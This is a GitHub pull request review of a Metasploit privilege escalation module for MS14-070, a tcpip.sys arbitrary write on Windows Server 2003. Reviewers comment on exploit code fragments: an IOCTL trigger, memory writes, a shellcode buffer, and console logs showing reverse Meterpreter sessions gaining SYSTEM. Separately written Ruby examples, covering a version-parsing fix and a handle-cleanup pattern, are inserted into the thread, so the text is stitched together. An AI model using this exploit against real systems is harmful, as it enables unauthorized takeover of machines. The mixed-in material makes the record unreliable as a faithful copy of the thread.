Module ms14 070 #4664

Merged
merged 1 commit into from Feb 5, 2015


zeroSteiner self-assigned this Jan 29, 2015

end

handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
if handle.nil?

OJ (Contributor) Jan 29, 2015

unless handle is preferred.

p = payload.encoded
new_pid = create_proc

if new_pid.nil?

OJ (Contributor) Jan 29, 2015

unless new_pid :)


if new_pid.nil?
print_warning('Unable to create a new process.')
return

OJ (Contributor) Jan 29, 2015

This looks like another case for fail_with instead of print_warning followed by return.


session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")

if not this_proc.memory.writable?(0x1000)

OJ (Contributor) Jan 29, 2015

unless this_proc.memory.writable?(0x1000)

if not this_proc.memory.writable?(0x1000)
vprint_error("Failed to allocate memory")
return nil
else

OJ (Contributor) Jan 29, 2015

else case not required thanks to the return nil on line 138.


unless is_system?
fail_with(Failure::Unknown, "The exploitation wasn't successful")
else

OJ (Contributor) Jan 29, 2015

else case not required as fail_with will exit.

this_proc.memory.write(0x38, "\x00\x00")
this_proc.memory.write(0x1100, buf)
this_proc.memory.write(0x2b, "\x00\x00")
this_proc.memory.write(0x2000, sc)

OJ (Contributor) Jan 29, 2015

Should any of these magic numbers be constants with more meaningful names? I see that 0x1100 is used a couple of times, so perhaps it'd be better to use a constant for this.

OJ (Contributor) commented Jan 29, 2015

Nice submission! I see that @zeroSteiner has assigned himself, so I shall leave the PR in his very capable hands.

Cheers!


def initialize(info={})
super(update_info(info, {
'Name' => 'Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation',

zeroSteiner (Contributor) Jan 29, 2015

The module name could be a bit more meaningful. We try to not have target information included in them. Maybe something like tcpip.sys Arbitrary Write Privilege Escalation


register_options(
[
OptString.new('PID', [true, 'The target PID to elevate into', nil]),

zeroSteiner (Contributor) Jan 29, 2015

OptInt instead of OptString

zeroSteiner (Contributor) Jan 29, 2015

Also I'm not sure where this datastore option is referenced.


buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"

sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04"

zeroSteiner (Contributor) Jan 29, 2015

A disassembly of the shellcode in comments would be nice, so we understand what it is expected to do.

KoreLogicSecurity (Contributor) commented Jan 29, 2015

Thanks for the feedback @OJ & @zeroSteiner , updated.

major, minor, build, revision, branch = file_version(file_path)
vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

if ("#{major}.#{minor}.#{build}" == "5.2.3790" && "#{revision}" < 5440)

zeroSteiner (Contributor) Jan 29, 2015

This seems to be raising an ArgumentError when I run the check method. revision should probably be converted to an integer (not a string) if it is not one already.

Example output:

msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > check

[*] [2015.01.29-13:28:51] tcpip.sys file version: 5.2.3790.4573 branch: 45
[-] 192.168.90.142 - Check failed: ArgumentError comparison of String with 5440 failed
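The fix the comment above asks for, as an added example that is not the module's own code: parse the tcpip.sys version into Integers so the revision compares numerically, alongside a reproduction of the String-versus-Integer comparison that raised the ArgumentError. The "5.2.3790" prefix and 5440 threshold are taken from the check method under review; the function names are my own.

```ruby
# Added example, not code from the PR. Constants mirror the values in the
# module's check method: vulnerable builds are 5.2.3790 with revision < 5440.
VULN_PREFIX = [5, 2, 3790].freeze   # Windows Server 2003 SP2 tcpip.sys build
FIXED_REVISION = 5440               # first revision the check treats as patched

# Reproduces the original defect: "#{revision}" is a String, and String#<
# with an Integer operand raises ArgumentError. Returns the error message.
def buggy_revision_check(revision)
  "#{revision}" < FIXED_REVISION
rescue ArgumentError => e
  e.message
end

# Split a dotted version string into four Integers; nil on malformed input.
def parse_version(str)
  parts = str.to_s.strip.split('.')
  return nil unless parts.length == 4 && parts.all? { |p| p.match?(/\A\d+\z/) }
  parts.map(&:to_i)
end

# Corrected check logic: compare integers, not strings. Returns :vulnerable,
# :safe, or :unknown when the version string cannot be parsed.
def check_tcpip_version(version_str)
  v = parse_version(version_str)
  return :unknown if v.nil?
  major, minor, build, revision = v
  return :safe unless [major, minor, build] == VULN_PREFIX
  revision < FIXED_REVISION ? :vulnerable : :safe
end
```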

zeroSteiner (Contributor) commented Jan 29, 2015

My initial test was kind of successful. After getting around the issue in the check method that I commented on above, a new elevated session is opened. However the original session that the exploit was run on died unexpectedly. I'll look into this a bit more later today.

Example output:

msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > rexploit
[*] Reloading module...

[*] [2015.01.29-13:31:34] Started reverse handler on 192.168.5.10:4444 
[*] [2015.01.29-13:31:35] tcpip.sys file version: 5.2.3790.4573 branch: 45
[*] [2015.01.29-13:31:36] Injecting 281 bytes into 980 memory and executing it...
[*] [2015.01.29-13:31:36] Creating the thread to execute in 0x3c0000 (pid=980)
[*] [2015.01.29-13:31:36] Sending stage (770048 bytes) to 192.168.5.10
[*] [2015.01.29-13:31:36] Storing the shellcode in memory...
[*] Meterpreter session 2 opened (192.168.5.10:4444 -> 192.168.5.10:43090) at 2015-01-29 13:31:38 -0500
[*] [2015.01.29-13:31:38] Triggering the vulnerability...
[*] 192.168.90.142 - Meterpreter session 1 closed.  Reason: Died


^C[-] [2015.01.29-13:31:53] Exploit failed: Interrupt 
[-] [2015.01.29-13:31:53] Call stack:
REDACTED

meterpreter > sysinfo
Computer        : TEST-HTVDPU1HIG
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

print_status("Triggering the vulnerability...")
session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
session.railgun.kernel32.CloseHandle(handle)

Meatballs1 (Contributor) Jan 29, 2015

Should wrap Lines 120 to 169 in a begin...ensure block so that the handle is closed if an exception is raised or we return early...
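The begin...ensure shape the comment above asks for, as an added example rather than the module's code: the device handle is opened before the block and closed in ensure, so CloseHandle runs on a normal finish, an early return, and a fail_with abort. FakeRailgun, FakeModule and the handle value are constructed stand-ins for session.railgun and the Metasploit module so the example runs offline.

```ruby
# Added example, not code from the PR. Stand-in for session.railgun that only
# records which handles were closed, so the cleanup can be asserted on.
class FakeRailgun
  attr_reader :closed
  def initialize; @closed = []; end
  def close_handle(h); @closed << h; end
end

class ExploitAborted < StandardError; end

# Stand-in for the module; fail_at selects which step exits early.
class FakeModule
  attr_reader :railgun
  def initialize(railgun, fail_at: :none)
    @railgun = railgun
    @fail_at = fail_at
  end

  # Stand-in for fail_with: aborts the run by raising, as the real one does.
  def fail_with(msg)
    raise ExploitAborted, msg
  end

  def open_device; 0x1234; end  # constructed handle value

  # The handle is acquired outside the begin block (nothing to close if that
  # fails) and released in ensure regardless of how the body exits.
  def run
    handle = open_device
    fail_with('Unable to open \\\\.\\tcp device') if handle.nil?
    begin
      fail_with('Failed to allocate memory') if @fail_at == :alloc
      return :early if @fail_at == :early_return
      fail_with("The exploitation wasn't successful") if @fail_at == :trigger
      :done
    ensure
      railgun.close_handle(handle)
    end
  end
end
```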

fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
end

print_status("Storing the shellcode in memory...")

Meatballs1 (Contributor) Jan 29, 2015

Can you inject into the new process that has been created, or even a third process so that the original session is safe from crashes?

I guess not as opening the device handles in this process...

OJ (Contributor) Feb 5, 2015

+1 here. This would make it more in line with the way the other local exploits work. Is there much involved in either making open_device function in a more general manner or just emulating the functionality it contains so that it works in another process?

zeroSteiner (Contributor) Feb 5, 2015

@OJ since KoreLogicSecurity/metasploit-framework#1 was landed the exploit injects the payload into itself. The result is no new processes are created, one new session is opened and both the new session and the current session are elevated.

OJ (Contributor) Feb 5, 2015

Yeah I saw that mate, thanks. Do you think that it'd be a good idea to make it work in another process, so that it's consistent with the other local exploits?

zeroSteiner (Contributor) Feb 5, 2015

I misunderstood. IMO I don't think it's necessary. Most of the other local windows exploits that do not implement DLLs elevate themselves then execute the payload in a SYSTEM process, either by creating one or finding one.

zeroSteiner (Contributor) commented Feb 5, 2015

@KoreLogicSecurity I got a chance to really look into this module. I'm proposing some changes to it that you can review in KoreLogicSecurity/metasploit-framework#1.

The primary purpose of the changes is to prevent the module from killing the session which runs it and then hanging.

KoreLogicSecurity (Contributor) commented Feb 5, 2015

Changes from @zeroSteiner looked great, merged into our fork, please land =)

zeroSteiner (Contributor) commented Feb 5, 2015

Thanks @KoreLogicSecurity! Working as intended now:

msf-git (S:0 J:0) exploit(handler) > exploit

[*] [2015.02.05-18:29:37] Started reverse handler on 192.168.90.1:4444 
[*] [2015.02.05-18:29:38] Starting the payload handler...
[*] [2015.02.05-18:29:39] Sending stage (770048 bytes) to 192.168.90.142
[*] Meterpreter session 4 opened (192.168.90.1:4444 -> 192.168.90.142:1034) at 2015-02-05 18:29:41 -0500

meterpreter > sysinfo
Computer        : TEST-HTVDPU1HIG
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background 
[*] Backgrounding session 4...
msf-git (S:1 J:0) exploit(handler) > previous 
msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > set SESSION -1
SESSION => -1
msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > exploit

[*] [2015.02.05-18:29:54] Started reverse handler on 192.168.90.1:4444 
[*] [2015.02.05-18:29:56] tcpip.sys file version: 5.2.3790.4573 branch: 45
[*] [2015.02.05-18:29:56] Storing the shellcode in memory...
[*] [2015.02.05-18:29:57] Triggering the vulnerability...
[*] [2015.02.05-18:29:57] Checking privileges after exploitation...
[+] [2015.02.05-18:29:57] Exploitation successful!
[*] [2015.02.05-18:29:58] Creating the thread to execute in 0x1000000 (pid=2452)
[*] [2015.02.05-18:29:58] Sending stage (770048 bytes) to 192.168.90.142
[*] Meterpreter session 5 opened (192.168.90.1:4444 -> 192.168.90.142:1035) at 2015-02-05 18:29:59 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Landing this in just a minute after a minor change to the module description.

zeroSteiner merged commit 4fabe85 into rapid7:master Feb 5, 2015

1 check passed: continuous-integration/travis-ci (The Travis CI build passed)

zeroSteiner added a commit that referenced this pull request Feb 5, 2015
